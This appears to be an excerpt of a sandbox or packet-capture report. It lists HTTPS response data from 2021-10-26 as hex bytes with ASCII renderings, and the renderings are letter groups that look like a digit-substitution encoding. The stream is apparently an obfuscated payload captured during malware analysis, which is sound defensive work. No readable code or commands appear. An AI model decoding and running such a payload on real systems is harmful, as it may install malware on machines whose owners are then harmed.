70 20 54 70 55 20 4d 67 69 20 50 4d 20 54 53 4d
                                                                                                Data Ascii: TPO Tn UT Tgn MiT Tpg TgO TgS Oi MTp MPP TUP MgU TO pp MTU PP Tgp PT g M nO Tii gg TP MiM Mgg Pn MgS TgT MTU TOp TSU PT MgP MMn Pg TiP Tgg iP OS MSg MPi On TOi TiM TSS TST Tgg pp TTM pO MgO TUS pT UM TSp MMg pp TiU Tgp TOn TT nU MTg Tii Pp TpU Mgi PM TSM
                                                                                                2021-10-26 15:35:18 UTC7280INData Raw: 53 67 20 53 20 54 55 67 20 69 50 20 54 6e 55 20 55 70 20 67 20 4f 69 20 54 55 55 20 67 20 4d 69 55 20 4d 54 20 4d 50 50 20 54 4d 70 20 54 6e 4d 20 4d 53 53 20 6e 69 20 4d 69 67 20 54 50 55 20 67 4f 20 54 50 50 20 54 69 50 20 4d 50 67 20 54 55 50 20 54 67 69 20 50 20 54 67 55 20 4d 4d 4f 20 54 69 4d 20 54 53 54 20 70 54 20 67 69 20 54 6e 6e 20 4d 54 20 4d 54 50 20 4f 50 20 67 4d 20 50 53 20 54 50 67 20 4d 69 20 55 4f 20 4f 50 20 4d 4f 20 70 69 20 54 54 4f 20 4d 4f 20 6e 55 20 54 69 55 20 67 20 54 70 54 20 54 69 67 20 4d 54 55 20 4d 53 4f 20 4d 69 6e 20 54 54 70 20 54 70 50 20 4f 69 20 67 54 20 54 55 67 20 4f 6e 20 54 4d 6e 20 54 69 4f 20 54 55 55 20 69 54 20 54 6e 70 20 54 69 67 20 67 55 20 54 67 20 54 70 67 20 4d 6e 20 54 67 50 20 55 55 20 6e 4d 20 4d 4d
                                                                                                Data Ascii: Sg S TUg iP TnU Up g Oi TUU g MiU MT MPP TMp TnM MSS ni Mig TPU gO TPP TiP MPg TUP Tgi P TgU MMO TiM TST pT gi Tnn MT MTP OP gM PS TPg Mi UO OP MO pi TTO MO nU TiU g TpT Tig MTU MSO Min TTp TpP Oi gT TUg On TMn TiO TUU iT Tnp Tig gU Tg Tpg Mn TgP UU nM MM
                                                                                                2021-10-26 15:35:18 UTC7296INData Raw: 4f 50 20 54 67 6e 20 4d 4d 67 20 69 50 20 6e 50 20 4d 67 4d 20 54 67 54 20 69 4d 20 69 20 54 50 6e 20 55 20 54 69 69 20 4d 4d 4f 20 70 4d 20 50 6e 20 4d 67 4d 20 50 4d 20 54 4d 70 20 70 67 20 54 4d 4f 20 4d 67 70 20 67 4d 20 53 20 4d 53 55 20 54 70 20 70 6e 20 4d 4d 20 4d 67 6e 20 67 70 20 69 6e 20 54 6e 6e 20 54 6e 70 20 54 54 4f 20 54 4d 55 20 54 69 54 20 50 69 20 54 55 70 20 4d 67 4d 20 54 6e 6e 20 54 69 4f 20 4d 54 67 20 54 6e 6e 20 4d 53 4f 20 54 67 6e 20 54 69 4d 20 54 4d 70 20 4d 67 4d 20 54 54 20 4d 4d 54 20 54 70 4d 20 54 50 6e 20 4d 67 6e 20 50 50 20 54 4d 4d 20 50 50 20 70 6e 20 69 6e 20 4d 6e 20 54 4f 20 4d 54 4d 20 4d 50 53 20 4d 54 55 20 55 55 20 4d 4d 70 20 54 54 55 20 69 4f 20 54 50 50 20 54 70 20 54 53 50 20 54 67 54 20 67 6e 20 54 4d 20
                                                                                                Data Ascii: OP Tgn MMg iP nP MgM TgT iM i TPn U Tii MMO pM Pn MgM PM TMp pg TMO Mgp gM S MSU Tp pn MM Mgn gp in Tnn Tnp TTO TMU TiT Pi TUp MgM Tnn TiO MTg Tnn MSO Tgn TiM TMp MgM TT MMT TpM TPn Mgn PP TMM PP pn in Mn TO MTM MPS MTU UU MMp TTU iO TPP Tp TSP TgT gn TM
                                                                                                2021-10-26 15:35:18 UTC7312INData Raw: 50 20 54 4d 50 20 54 69 53 20 54 6e 4d 20 54 55 4f 20 4d 55 20 54 50 20 54 6e 50 20 6e 53 20 4f 55 20 54 4d 70 20 54 55 53 20 4d 4d 53 20 4d 53 54 20 54 69 67 20 4d 4d 54 20 4d 4d 20 4d 50 50 20 4d 53 54 20 4f 70 20 54 69 20 54 55 53 20 4d 70 20 54 4f 6e 20 67 69 20 4d 69 54 20 4d 54 53 20 54 54 50 20 54 4d 6e 20 54 70 69 20 54 67 70 20 54 4f 6e 20 4d 69 20 50 6e 20 54 54 54 20 70 53 20 4d 4d 54 20 54 6e 6e 20 54 69 70 20 54 50 50 20 4f 20 54 70 4d 20 4d 54 50 20 54 67 4f 20 54 54 69 20 54 54 55 20 4d 67 67 20 55 55 20 69 4d 20 4d 50 69 20 54 20 69 70 20 54 6e 54 20 54 55 70 20 54 69 70 20 70 55 20 4d 67 54 20 4d 54 6e 20 69 6e 20 4f 70 20 6e 4f 20 4d 53 4d 20 4d 4d 69 20 4d 50 20 4d 53 4f 20 70 4d 20 4d 69 70 20 70 53 20 4d 4d 50 20 54 67 20 69 53 20 54
                                                                                                Data Ascii: P TMP TiS TnM TUO MU TP TnP nS OU TMp TUS MMS MST Tig MMT MM MPP MST Op Ti TUS Mp TOn gi MiT MTS TTP TMn Tpi Tgp TOn Mi Pn TTT pS MMT Tnn Tip TPP O TpM MTP TgO TTi TTU Mgg UU iM MPi T ip TnT TUp Tip pU MgT MTn in Op nO MSM MMi MP MSO pM Mip pS MMP Tg iS T
                                                                                                2021-10-26 15:35:18 UTC7328INData Raw: 4f 20 6e 54 20 54 6e 6e 20 54 4d 20 50 53 20 6e 6e 20 54 54 4f 20 67 67 20 54 4f 6e 20 4f 6e 20 54 6e 50 20 54 53 50 20 4d 54 69 20 54 55 53 20 54 4d 55 20 67 55 20 54 69 55 20 4d 53 20 54 55 69 20 4d 54 53 20 4f 54 20 67 20 4d 69 4d 20 54 55 4f 20 69 4f 20 4d 69 4d 20 6e 53 20 54 55 4d 20 54 54 4d 20 54 4d 53 20 4d 53 70 20 54 69 70 20 4d 67 69 20 4d 67 4f 20 54 55 69 20 54 55 4d 20 4d 53 4d 20 6e 55 20 54 50 4d 20 54 55 53 20 69 53 20 54 4d 6e 20 50 6e 20 4d 53 67 20 4d 54 67 20 54 70 4f 20 54 69 4d 20 54 4f 4f 20 50 55 20 69 4f 20 54 55 50 20 54 69 55 20 6e 53 20 70 55 20 54 55 69 20 50 50 20 69 67 20 54 69 53 20 54 6e 4d 20 6e 55 20 4d 67 53 20 4d 54 50 20 70 67 20 4d 4f 20 54 4f 55 20 4d 69 4d 20 70 70 20 54 4f 54 20 53 20 54 53 4f 20 4d 50 67 20 4d
                                                                                                Data Ascii: O nT Tnn TM PS nn TTO gg TOn On TnP TSP MTi TUS TMU gU TiU MS TUi MTS OT g MiM TUO iO MiM nS TUM TTM TMS MSp Tip Mgi MgO TUi TUM MSM nU TPM TUS iS TMn Pn MSg MTg TpO TiM TOO PU iO TUP TiU nS pU TUi PP ig TiS TnM nU MgS MTP pg MO TOU MiM pp TOT S TSO MPg M
                                                                                                2021-10-26 15:35:18 UTC7344INData Raw: 70 6e 20 67 67 20 54 53 4d 20 54 54 6e 20 54 53 4f 20 4d 69 53 20 4d 54 70 20 6e 67 20 4d 50 4d 20 4d 50 4d 20 54 50 67 20 70 55 20 50 4f 20 67 67 20 54 55 55 20 54 54 20 6e 55 20 70 4d 20 4d 67 4d 20 70 69 20 6e 70 20 70 67 20 4d 53 50 20 54 6e 6e 20 54 4f 67 20 4d 54 54 20 54 70 6e 20 4d 67 50 20 4d 50 69 20 4d 20 54 70 4d 20 54 55 4d 20 54 67 4f 20 54 54 55 20 54 53 70 20 4f 67 20 4d 54 53 20 4d 50 67 20 54 4d 67 20 4d 69 53 20 4d 54 54 20 4d 4d 54 20 4d 50 67 20 54 53 4d 20 54 50 67 20 54 70 55 20 54 54 4d 20 54 67 20 54 67 50 20 54 69 70 20 69 70 20 70 50 20 4d 4d 55 20 4d 69 4d 20 54 50 50 20 54 6e 53 20 55 53 20 4d 67 54 20 54 50 4d 20 55 20 54 70 53 20 50 55 20 54 70 53 20 4d 4d 69 20 54 69 53 20 55 70 20 54 53 67 20 4d 53 70 20 67 50 20 50 4d 20
                                                                                                Data Ascii: pn gg TSM TTn TSO MiS MTp ng MPM MPM TPg pU PO gg TUU TT nU pM MgM pi np pg MSP Tnn TOg MTT Tpn MgP MPi M TpM TUM TgO TTU TSp Og MTS MPg TMg MiS MTT MMT MPg TSM TPg TpU TTM Tg TgP Tip ip pP MMU MiM TPP TnS US MgT TPM U TpS PU TpS MMi TiS Up TSg MSp gP PM
                                                                                                2021-10-26 15:35:18 UTC7360INData Raw: 4d 4d 69 20 54 70 69 20 4d 67 20 50 67 20 50 4f 20 6e 6e 20 4d 53 69 20 4d 4d 50 20 69 50 20 67 70 20 4d 4d 4d 20 69 67 20 53 20 4d 54 50 20 54 70 4f 20 54 67 70 20 54 53 6e 20 54 67 55 20 54 50 20 54 67 54 20 4d 20 54 53 53 20 50 4f 20 4d 54 4d 20 4d 53 20 50 70 20 54 4d 4d 20 4d 53 54 20 4d 67 6e 20 4d 50 50 20 50 54 20 6e 53 20 54 4f 54 20 54 54 54 20 4d 53 50 20 4d 4d 55 20 50 69 20 54 4d 70 20 54 50 4d 20 4d 53 67 20 4f 55 20 4d 4f 20 54 67 4f 20 4d 4f 20 54 69 67 20 54 50 50 20 69 4d 20 54 50 55 20 54 4d 50 20 54 53 20 67 67 20 4d 54 54 20 54 4f 53 20 54 53 54 20 54 69 4d 20 4d 54 70 20 54 70 6e 20 54 69 70 20 4f 6e 20 54 4d 4d 20 69 55 20 4d 69 50 20 67 70 20 4d 70 20 4d 54 67 20 54 70 70 20 55 4f 20 55 53 20 55 4d 20 54 50 50 20 54 6e 54 20 54 6e
                                                                                                Data Ascii: MMi Tpi Mg Pg PO nn MSi MMP iP gp MMM ig S MTP TpO Tgp TSn TgU TP TgT M TSS PO MTM MS Pp TMM MST Mgn MPP PT nS TOT TTT MSP MMU Pi TMp TPM MSg OU MO TgO MO Tig TPP iM TPU TMP TS gg MTT TOS TST TiM MTp Tpn Tip On TMM iU MiP gp Mp MTg Tpp UO US UM TPP TnT Tn
                                                                                                2021-10-26 15:35:18 UTC7376INData Raw: 53 20 4d 53 70 20 4d 4d 53 20 54 67 50 20 55 69 20 54 54 50 20 54 6e 20 54 67 20 54 6e 67 20 70 70 20 4f 53 20 4d 50 54 20 4d 67 20 55 55 20 54 70 4d 20 67 54 20 54 53 70 20 54 54 54 20 54 70 4f 20 4d 53 4d 20 54 54 70 20 54 67 20 4d 54 20 4d 4d 4d 20 54 4d 50 20 54 4d 4d 20 67 4f 20 4d 69 4f 20 55 20 54 69 20 6e 4f 20 4d 69 4f 20 4d 4d 70 20 54 67 20 4d 53 4f 20 70 54 20 4d 67 53 20 50 69 20 54 55 6e 20 54 70 4f 20 69 4d 20 67 4f 20 4d 53 6e 20 4d 4d 50 20 4d 50 69 20 4d 69 4f 20 4d 50 54 20 54 4d 70 20 54 69 20 4d 4d 4d 20 54 54 55 20 54 54 54 20 67 54 20 54 4f 55 20 50 53 20 70 4d 20 4d 54 54 20 54 69 67 20 54 67 53 20 70 70 20 69 67 20 4d 69 67 20 4d 53 4f 20 6e 4d 20 54 55 55 20 54 6e 6e 20 4d 6e 20 4f 50 20 54 67 20 69 54 20 70 20 54 54 50 20 54 67
                                                                                                Data Ascii: S MSp MMS TgP Ui TTP Tn Tg Tng pp OS MPT Mg UU TpM gT TSp TTT TpO MSM TTp Tg MT MMM TMP TMM gO MiO U Ti nO MiO MMp Tg MSO pT MgS Pi TUn TpO iM gO MSn MMP MPi MiO MPT TMp Ti MMM TTU TTT gT TOU PS pM MTT Tig TgS pp ig Mig MSO nM TUU Tnn Mn OP Tg iT p TTP Tg
                                                                                                2021-10-26 15:35:18 UTC7392INData Raw: 20 55 53 20 54 55 70 20 4d 53 4d 20 54 4f 4d 20 53 20 4d 4d 69 20 54 50 70 20 69 69 20 54 4f 53 20 54 70 70 20 4d 53 69 20 4f 4d 20 70 4f 20 54 55 4d 20 54 4d 4f 20 69 69 20 54 55 70 20 70 4f 20 50 6e 20 4d 50 20 54 4d 70 20 54 4d 6e 20 54 50 55 20 54 55 50 20 70 6e 20 4d 53 6e 20 54 67 4d 20 6e 67 20 4d 54 20 54 67 50 20 4d 50 69 20 54 6e 55 20 54 53 54 20 4d 67 54 20 54 6e 55 20 4d 4d 20 4f 55 20 54 50 70 20 69 70 20 54 55 69 20 54 55 70 20 67 55 20 54 70 69 20 70 69 20 54 4f 53 20 54 20 4d 69 55 20 54 70 70 20 54 69 4d 20 50 4d 20 4f 67 20 6e 4f 20 4d 69 69 20 6e 20 4d 54 54 20 54 4f 55 20 54 55 20 50 55 20 4d 67 50 20 54 54 4d 20 50 55 20 4d 69 4f 20 4d 53 55 20 4d 4d 70 20 69 20 6e 55 20 6e 6e 20 54 70 67 20 54 54 54 20 4f 67 20 54 69 4d 20 55 4f 20
                                                                                                Data Ascii: US TUp MSM TOM S MMi TPp ii TOS Tpp MSi OM pO TUM TMO ii TUp pO Pn MP TMp TMn TPU TUP pn MSn TgM ng MT TgP MPi TnU TST MgT TnU MM OU TPp ip TUi TUp gU Tpi pi TOS T MiU Tpp TiM PM Og nO Mii n MTT TOU TU PU MgP TTM PU MiO MSU MMp i nU nn Tpg TTT Og TiM UO
                                                                                                2021-10-26 15:35:18 UTC7408INData Raw: 70 53 20 69 69 20 4d 67 69 20 4d 54 4d 20 69 67 20 54 70 20 54 53 67 20 69 70 20 4d 70 20 54 69 54 20 4d 54 4f 20 54 70 53 20 69 70 20 4d 53 4d 20 4d 4d 6e 20 4d 54 4d 20 4d 53 53 20 4d 50 4d 20 54 54 53 20 70 69 20 4f 4d 20 54 67 69 20 70 4d 20 67 70 20 4d 4d 6e 20 67 20 54 70 69 20 54 69 55 20 70 55 20 4d 53 55 20 4f 67 20 67 50 20 54 70 53 20 4d 50 4d 20 54 55 50 20 4d 54 4f 20 54 69 69 20 54 50 53 20 6e 4f 20 54 54 50 20 54 69 6e 20 67 53 20 4d 67 69 20 4d 50 69 20 54 55 55 20 50 53 20 55 70 20 4d 4d 20 4d 50 50 20 4d 50 50 20 54 4f 4f 20 54 53 69 20 54 67 69 20 6e 20 4d 50 50 20 54 50 6e 20 4d 69 53 20 54 53 20 70 70 20 54 55 4f 20 4f 6e 20 67 20 70 70 20 54 4f 70 20 4d 50 69 20 70 69 20 4d 50 20 4d 53 55 20 54 67 4f 20 54 55 50 20 55 67 20 54 53 69
                                                                                                Data Ascii: pS ii Mgi MTM ig Tp TSg ip Mp TiT MTO TpS ip MSM MMn MTM MSS MPM TTS pi OM Tgi pM gp MMn g Tpi TiU pU MSU Og gP TpS MPM TUP MTO Tii TPS nO TTP Tin gS Mgi MPi TUU PS Up MM MPP MPP TOO TSi Tgi n MPP TPn MiS TS pp TUO On g pp TOp MPi pi MP MSU TgO TUP Ug TSi
                                                                                                2021-10-26 15:35:18 UTC7424INData Raw: 50 69 20 54 4d 20 54 20 53 20 50 6e 20 70 20 53 20 53 20 53 20 69 53 20 54 69 20 53 20 53 20 54 53 20 53 20 69 4d 20 53 20 53 20 54 20 54 70 20 53 20 53 20 54 20 53 20 70 20 53 20 54 70 55 20 4d 53 55 20 53 20 54 50 20 54 6e 69 20 53 20 53 20 53 20 4d 6e 20 69 55 20 54 54 20 53 20 4d 6e 20 54 20 53 20 53 20 55 20 53 20 53 20 54 6e 20 54 69 53 20 67 50 20 53 20 53 20 54 20 53 20 53 20 69 53 20 54 69 20 53 20 53 20 54 53 20 53 20 67 4d 20 4d 50 69 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 4d 50 69 20 54 69 20 53 20 53 20 53 20 67 4d 20 4d 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 4d 20 53 20 54 4d 70 20 69 55 20 53 20 53 20 54 53 20 4d 50 69 20 4f 20 53 20 53 20 67 4d 20 4d 20 53 20 53 20 53 20 54 54 54 20 69 4f 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 67
                                                                                                Data Ascii: Pi TM T S Pn p S S S iS Ti S S TS S iM S S T Tp S S T S p S TpU MSU S TP Tni S S S Mn iU TT S Mn T S S U S S Tn TiS gP S S T S S iS Ti S S TS S gM MPi MPP MPP MPP MPi Ti S S S gM M S S S MPi Ti M S TMp iU S S TS MPi O S S gM M S S S TTT iO S S TS MPi Ti g
                                                                                                2021-10-26 15:35:18 UTC7440INData Raw: 53 20 53 20 53 20 53 20 4d 50 69 20 67 20 4f 50 20 4d 50 69 20 54 4d 20 4d 20 53 20 67 4d 20 53 20 53 20 53 20 53 20 4d 50 69 20 54 20 4f 50 20 4d 50 69 20 54 6e 20 54 54 70 20 54 53 20 53 20 53 20 54 20 69 53 20 54 70 20 53 20 53 20 54 53 20 4d 4d 54 20 54 50 67 20 4d 50 50 20 4d 50 50 20 4d 50 50 20 67 4d 20 50 54 20 53 20 54 53 20 54 4d 55 20 69 53 20 54 6e 20 53 20 53 20 54 53 20 54 4d 4d 20 4d 50 69 20 54 4d 20 4d 20 53 20 50 6e 20 70 20 53 20 53 20 53 20 69 53 20 54 69 20 53 20 53 20 54 53 20 53 20 4d 50 69 20 54 4d 20 53 20 53 20 69 4d 20 70 50 20 4d 55 20 53 20 53 20 54 20 53 20 53 20 53 20 70 20 53 20 53 20 53 20 54 55 20 4d 20 53 20 53 20 50 55 20 4d 20 53 20 53 20 54 50 20 53 20 53 20 53 20 4d 69 20 4d 20 53 20 53 20 4d 6e 20 69 55 20 54 54 20
                                                                                                Data Ascii: S S S S MPi g OP MPi TM M S gM S S S S MPi T OP MPi Tn TTp TS S S T iS Tp S S TS MMT TPg MPP MPP MPP gM PT S TS TMU iS Tn S S TS TMM MPi TM M S Pn p S S S iS Ti S S TS S MPi TM S S iM pP MU S S T S S S p S S S TU M S S PU M S S TP S S S Mi M S S Mn iU TT
                                                                                                2021-10-26 15:35:18 UTC7456INData Raw: 69 20 54 69 20 54 53 20 53 20 4d 50 69 20 54 4d 20 54 53 20 53 20 50 6e 20 4d 69 20 53 20 53 20 53 20 67 4d 20 54 4d 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 54 4d 70 20 54 54 50 20 53 20 53 20 54 53 20 4d 50 69 20 54 69 20 70 20 53 20 53 20 50 70 20 70 4d 20 53 20 53 20 53 20 53 20 67 4d 20 54 69 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 55 20 53 20 69 53 20 67 53 20 53 20 53 20 70 20 67 55 20 67 4d 20 54 50 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 55 20 53 20 67 4d 20 50 20 53 20 53 20 53 20 69 53 20 4d 4f 20 53 20 53 20 70 20 67 55 20 67 4d 20 54 70 20 53 20 53 20 53 20 4d 50 69 20 54 69 20 67 20 53 20 4d 50 69 20 54 4d 20 55 20 53 20 4d 50 69 20 54 69 20 70 20 53 20 53 20
                                                                                                Data Ascii: i Ti TS S MPi TM TS S Pn Mi S S S gM TM S S S MPi Ti g S TMp TTP S S TS MPi Ti p S S Pp pM S S S S gM Ti S S S MPi Ti g S MPi TM U S iS gS S S p gU gM TP S S S MPi Ti g S MPi TM U S gM P S S S iS MO S S p gU gM Tp S S S MPi Ti g S MPi TM U S MPi Ti p S S
                                                                                                2021-10-26 15:35:18 UTC7472INData Raw: 67 6e 20 67 4d 20 54 50 20 53 20 53 20 53 20 67 54 20 50 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 50 20 53 20 53 20 53 20 67 54 20 50 4d 20 54 50 6e 20 67 6e 20 67 4d 20 54 50 20 53 20 53 20 53 20 67 54 20 54 53 4d 20 54 50 6e 20 67 6e 20 67 54 20 54 50 20 67 54 20 54 54 54 20 54 50 6e 20 67 6e 20 67 4d 20 54 69 20 53 20 53 20 53 20 67 54 20 50 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 69 20 53 20 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 67 4d 20 54 69 20 53 20 53 20 53 20 67 54 20 50 54 20 54 50 6e 20 67 6e 20 67 4d 20 54 69 20 53 20 53 20 53 20 67 54 20 50 50 20 54 50 6e 20 67 6e 20 67 54 20 54 69 20 67 54 20 70 6e 20 54 50 6e 20 67 6e 20 67 4d 20 54 67 20 53 20 53 20 53 20 67 54 20 54 53 53 20 54 50 6e 20 67 6e 20 67 4d 20 54 67 20 53 20 53 20 53
                                                                                                Data Ascii: gn gM TP S S S gT Pn TPn gn gM TP S S S gT PM TPn gn gM TP S S S gT TSM TPn gn gT TP gT TTT TPn gn gM Ti S S S gT Pn TPn gn gM Ti S S S gT PT TPn gn gM Ti S S S gT PT TPn gn gM Ti S S S gT PP TPn gn gT Ti gT pn TPn gn gM Tg S S S gT TSS TPn gn gM Tg S S S
                                                                                                2021-10-26 15:35:18 UTC7488INData Raw: 20 54 4d 55 20 54 53 55 20 54 20 53 20 69 20 54 54 69 20 54 4f 4d 20 54 50 20 69 20 54 54 4d 20 54 54 69 20 54 69 53 20 54 70 20 69 20 54 54 4d 20 69 53 20 54 53 20 53 20 53 20 69 67 20 54 4d 55 20 54 53 4f 20 54 20 53 20 69 20 54 54 69 20 54 4f 4d 20 54 50 20 69 20 54 54 4d 20 54 54 69 20 54 6e 55 20 54 70 20 69 20 54 54 4d 20 69 53 20 54 54 20 53 20 53 20 69 67 20 54 4d 55 20 54 54 53 20 54 20 53 20 69 20 54 54 69 20 4d 54 69 20 54 70 20 69 20 54 54 4d 20 54 54 69 20 4d 4d 70 20 54 70 20 69 20 54 54 4d 20 69 53 20 54 4d 20 53 20 53 20 69 67 20 54 4d 55 20 54 54 54 20 54 20 53 20 69 20 54 54 69 20 54 4f 4d 20 54 50 20 69 20 54 54 4d 20 54 54 69 20 54 4d 20 54 6e 20 69 20 54 54 4d 20 69 53 20 54 67 20 53 20 53 20 69 67 20 54 4d 55 20 54 54 4d 20 54 20 53
                                                                                                Data Ascii: TMU TSU T S i TTi TOM TP i TTM TTi TiS Tp i TTM iS TS S S ig TMU TSO T S i TTi TOM TP i TTM TTi TnU Tp i TTM iS TT S S ig TMU TTS T S i TTi MTi Tp i TTM TTi MMp Tp i TTM iS TM S S ig TMU TTT T S i TTi TOM TP i TTM TTi TM Tn i TTM iS Tg S S ig TMU TTM T S
                                                                                                2021-10-26 15:35:18 UTC7504INData Raw: 70 20 54 4d 55 20 4f 20 54 50 67 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 4d 54 20 70 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 69 20 54 54 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 50 55 20 50 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 53 67 20 69 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 69 55 20 4f 4f 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 6e 69 20 4f 53 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 67 55 20 54 50 70 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 4d 67 20 4d 70 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 55 67 20 70 55 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 70 67 20 69 70 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20 54 4f 4d 20 4f 6e 20 4d 50 53 20 54 53 20 55 70 20 54 4d 55 20
                                                                                                Data Ascii: p TMU O TPg MPS TS Up TMU MMT pU MPS TS Up TMU Ti TTU MPS TS Up TMU TPU PU MPS TS Up TMU MSg iU MPS TS Up TMU iU OO MPS TS Up TMU Tni OS MPS TS Up TMU MgU TPp MPS TS Up TMU Mg Mp MPS TS Up TMU Ug pU MPS TS Up TMU Tpg ip MPS TS Up TMU TOM On MPS TS Up TMU
                                                                                                2021-10-26 15:35:18 UTC7520INData Raw: 55 20 54 20 4d 67 20 67 20 4f 20 53 20 50 4d 20 54 20 4d 55 20 67 20 4f 20 53 20 50 70 20 54 20 67 67 20 67 20 4f 20 53 20 70 53 20 54 20 67 55 20 67 20 4f 20 53 20 70 69 20 54 20 69 67 20 67 20 4f 20 53 20 70 55 20 54 20 69 55 20 67 20 4f 20 53 20 6e 4d 20 54 20 50 67 20 67 20 4f 20 53 20 6e 70 20 54 20 50 55 20 67 20 4f 20 53 20 55 53 20 54 20 70 67 20 67 20 4f 20 53 20 55 69 20 54 20 70 55 20 67 20 4f 20 53 20 55 55 20 54 20 6e 67 20 67 20 4f 20 53 20 4f 4d 20 54 20 6e 55 20 67 20 4f 20 53 20 4f 70 20 54 20 55 67 20 67 20 4f 20 53 20 54 53 53 20 54 20 55 55 20 67 20 4f 20 53 20 54 53 69 20 54 20 4f 67 20 67 20 4f 20 53 20 54 53 55 20 54 20 4f 55 20 67 20 4f 20 53 20 54 54 4d 20 54 20 54 53 67 20 67 20 4f 20 53 20 54 54 70 20 54 20 54 53 55 20 67 20 4f
                                                                                                Data Ascii: U T Mg g O S PM T MU g O S Pp T gg g O S pS T gU g O S pi T ig g O S pU T iU g O S nM T Pg g O S np T PU g O S US T pg g O S Ui T pU g O S UU T ng g O S OM T nU g O S Op T Ug g O S TSS T UU g O S TSi T Og g O S TSU T OU g O S TTM T TSg g O S TTp T TSU g O
                                                                                                2021-10-26 15:35:18 UTC7536INData Raw: 53 6e 20 54 53 54 20 53 20 55 50 20 70 6e 20 6e 4f 20 6e 6e 20 6e 67 20 70 4f 20 54 54 53 20 54 54 6e 20 54 53 4f 20 54 53 54 20 54 54 69 20 4f 6e 20 4f 55 20 54 53 55 20 54 53 54 20 53 20 6e 67 20 70 55 20 54 53 50 20 54 54 50 20 54 54 4d 20 54 54 54 20 54 54 50 20 4f 6e 20 4f 55 20 54 53 55 20 54 53 54 20 53 20 54 53 67 20 54 53 54 20 54 54 70 20 4f 50 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 55 4d 20 54 54 6e 20 54 54 53 20 54 54 70 20 54 53 50 20 54 53 4f 20 54 53 54 20 6e 53 20 54 53 50 20 54 53 54 20 54 53 55 20 54 53 53 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 55 67 20 4f 6e 20 54 53 4d 20 54 53 54 20 6e 4d 20 4f 6e 20 54 54 53 20 54 53 53 20 54 53 55 20 54 53 54 20 53 20 6e 54 20
                                                                                                Data Ascii: Sn TST S UP pn nO nn ng pO TTS TTn TSO TST TTi On OU TSU TST S ng pU TSP TTP TTM TTT TTP On OU TSU TST S TSg TST TTp OP nM On TTS TSS TSU TST S UM TTn TTS TTp TSP TSO TST nS TSP TST TSU TSS nM On TTS TSS TSU TST S Ug On TSM TST nM On TTS TSS TSU TST S nT
                                                                                                2021-10-26 15:35:18 UTC7552INData Raw: 20 54 70 53 20 4d 67 4f 20 54 69 53 20 54 6e 55 20 4d 67 4f 20 54 69 53 20 54 70 67 20 4d 67 4f 20 54 69 53 20 54 69 4f 20 4d 67 4f 20 54 69 53 20 54 67 69 20 4d 67 4f 20 54 69 54 20 54 4d 55 20 53 20 4d 67 4f 20 54 69 6e 20 54 67 4d 20 4d 67 4f 20 54 69 6e 20 54 67 54 20 4d 67 4f 20 54 69 6e 20 54 6e 6e 20 4d 67 4f 20 54 69 6e 20 54 67 70 20 4d 67 4f 20 54 69 6e 20 54 67 70 20 4d 67 4f 20 54 69 6e 20 54 55 53 20 4d 67 4f 20 54 69 6e 20 54 67 50 20 4d 67 4f 20 54 69 6e 20 54 4d 4f 20 4d 67 4f 20 54 69 6e 20 54 6e 6e 20 4d 67 4f 20 54 69 6e 20 54 50 4f 20 4d 67 4f 20 54 69 6e 20 54 50 70 20 4d 67 4f 20 54 69 6e 20 54 67 69 20 4d 67 4f 20 54 69 6e 20 54 4d 4f 20 4d 67 4f 20 54 69 6e 20 54 67 54 20 4d 67 4f 20 54 69 6e 20 54 4d 55 20 53 20 4d 67 69 20 54 50
                                                                                                Data Ascii: TpS MgO TiS TnU MgO TiS Tpg MgO TiS TiO MgO TiS Tgi MgO TiT TMU S MgO Tin TgM MgO Tin TgT MgO Tin Tnn MgO Tin Tgp MgO Tin Tgp MgO Tin TUS MgO Tin TgP MgO Tin TMO MgO Tin Tnn MgO Tin TPO MgO Tin TPp MgO Tin Tgi MgO Tin TMO MgO Tin TgT MgO Tin TMU S Mgi TP
                                                                                                2021-10-26 15:35:18 UTC7568INData Raw: 20 53 20 4d 4d 69 20 54 70 67 20 54 67 4f 20 4d 4d 69 20 54 70 4d 20 54 6e 69 20 4d 4d 69 20 54 70 67 20 54 50 70 20 4d 4d 69 20 54 70 4d 20 54 6e 67 20 4d 4d 69 20 54 70 67 20 54 70 55 20 4d 4d 69 20 54 70 4d 20 54 55 4f 20 4d 4d 69 20 54 70 4d 20 54 6e 67 20 4d 4d 69 20 54 70 4d 20 54 55 4f 20 4d 4d 69 20 54 70 67 20 54 50 70 20 4d 4d 69 20 54 70 4d 20 54 6e 54 20 4d 4d 69 20 54 70 4d 20 54 6e 4d 20 4d 4d 69 20 54 70 4d 20 54 55 70 20 4d 4d 69 20 54 70 4d 20 54 6e 67 20 4d 4d 69 20 54 70 67 20 54 50 54 20 4d 4d 69 20 54 70 67 20 54 67 69 20 53 20 4d 4d 50 20 54 55 4f 20 54 67 54 20 4d 4d 50 20 54 55 4f 20 54 4d 4f 20 4d 4d 50 20 54 55 4f 20 54 55 54 20 4d 4d 50 20 54 55 4f 20 54 69 4f 20 4d 4d 50 20 54 55 4f 20 54 67 53 20 4d 4d 50 20 54 4f 53 20 54 67
